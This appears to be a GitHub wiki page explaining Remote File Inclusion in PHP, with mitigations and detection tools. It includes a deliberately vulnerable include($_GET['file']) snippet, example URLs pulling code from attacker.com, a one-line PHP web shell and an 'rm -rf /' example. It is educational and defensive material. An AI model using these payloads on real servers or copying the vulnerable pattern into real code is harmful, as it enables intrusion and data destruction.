Remote File Inclusion - secuguru/security-terms GitHub Wiki

Remote File Inclusion (RFI) is a web security vulnerability that allows an attacker to include and execute a remote file on a web server by manipulating user input. Although RFI was historically a significant threat, it is less common today due to better secure coding practices and restrictions in modern web environments.

1. How Remote File Inclusion Works

RFI occurs when a web application dynamically includes files based on user input without proper validation or sanitization. This vulnerability allows attackers to include malicious files hosted on remote servers.

Vulnerable Code Example:

<?php
    $file = $_GET['file'];
    include($file);
?>

Input URL:

http://example.com/index.php?file=http://attacker.com/malicious.php

What Happens:

• The application fetches http://attacker.com/malicious.php.
• The included file executes as part of the server’s PHP script, potentially compromising the system.

2. Why RFI Is Less Common Today

1. Modern PHP Settings:

• By default, modern versions of PHP disable the allow_url_include directive.
• This prevents inclusion of remote files via functions like include() or require().
• Example (disabled in php.ini):

allow_url_include = Off

2. Secure Coding Practices:

• Increased awareness of input sanitization and validation has reduced RFI vulnerabilities.

3. Content Security Policy (CSP):

• Modern web applications enforce CSP headers, restricting the inclusion of untrusted scripts and resources.

4. Prevalence of Local File Inclusion (LFI):

• Attackers often exploit LFI, which is more common and easier to find.

3. Exploitation Techniques

a. File Inclusion

• Inject a remote file containing malicious code (e.g., a web shell).
• Example Payload:

http://example.com/index.php?file=http://attacker.com/shell.php

b. Code Execution

• Execute PHP code directly through a remotely included file.
• Example:
  • http://attacker.com/shell.php contains:

<?php system($_GET['cmd']); ?>

• Access via:

http://example.com/index.php?file=http://attacker.com/shell.php&cmd=id

c. Information Gathering

• Attackers may include remote files to exfiltrate sensitive data.

4. Potential Impact of RFI

1. Code Execution:

• Remote files containing PHP or server-side code can execute arbitrary commands.
• Example:

<?php
system('rm -rf /');
?>

2. Data Exfiltration:

• Steal sensitive data such as database credentials or user information.

3. Privilege Escalation:

• Gain elevated privileges by injecting scripts that exploit local configurations.

4. Web Shell Deployment:

• Install persistent backdoors for ongoing access.

5. Mitigation Techniques

1. Disable Remote File Inclusion:

• Set allow_url_include to Off in php.ini:

allow_url_include = Off

2. Sanitize and Validate Input:

• Restrict user input to a predefined whitelist of acceptable files.
• Example (PHP):

$allowed_files = ['home.php', 'about.php', 'contact.php'];
if (in_array($_GET['file'], $allowed_files)) {
    include($_GET['file']);
} else {
    die("Access Denied");
}

3. Use Secure File Inclusion:

• Always use static paths or resolve files locally.
• Example:

include('pages/' . basename($_GET['file']));

4. Restrict File Permissions:

• Limit access to sensitive files and directories on the server.

5. Content Security Policy (CSP):

• Enforce CSP headers to restrict external script and resource inclusion:

Content-Security-Policy: script-src 'self';

6. Web Application Firewalls (WAF):

• Use WAFs to block suspicious patterns indicative of RFI attacks (e.g., URLs in file parameters).

6. Tools for Detection

1. Burp Suite:

• Test for RFI vulnerabilities by sending malicious file inclusion payloads.

2. OWASP ZAP:

• Automated scanning for RFI in web applications.

3. Nikto:

• A web server scanner that detects RFI vulnerabilities.

4. Manual Testing:

• Use payloads like:

http://example.com/index.php?file=http://attacker.com/malicious.php

7. Real-World Example

Case Study: RFI in PHP Applications

• An old PHP application dynamically included files based on user input.
• An attacker injected:

http://example.com/index.php?file=http://attacker.com/malicious.php

• The malicious file installed a web shell, allowing the attacker to execute arbitrary commands, upload additional scripts, and exfiltrate sensitive data.

8. Summary

Aspect	Details
What is RFI?	Vulnerability allowing inclusion of remote files via user input.
Impact	Code execution, data theft, web shell installation, privilege escalation.
Why Less Common?	Modern PHP disables allow_url_include; better coding practices.
Prevention Techniques	Disable allow_url_include, validate input, enforce CSP, use WAF.
Tools for Detection	Burp Suite, OWASP ZAP, manual payload testing.

9. Conclusion

While Remote File Inclusion (RFI) is less common today due to improved server and application configurations, it remains a critical vulnerability for legacy systems and poorly configured applications. By adopting secure coding practices, validating user input, and leveraging server-side restrictions, organizations can effectively mitigate the risks associated with RFI.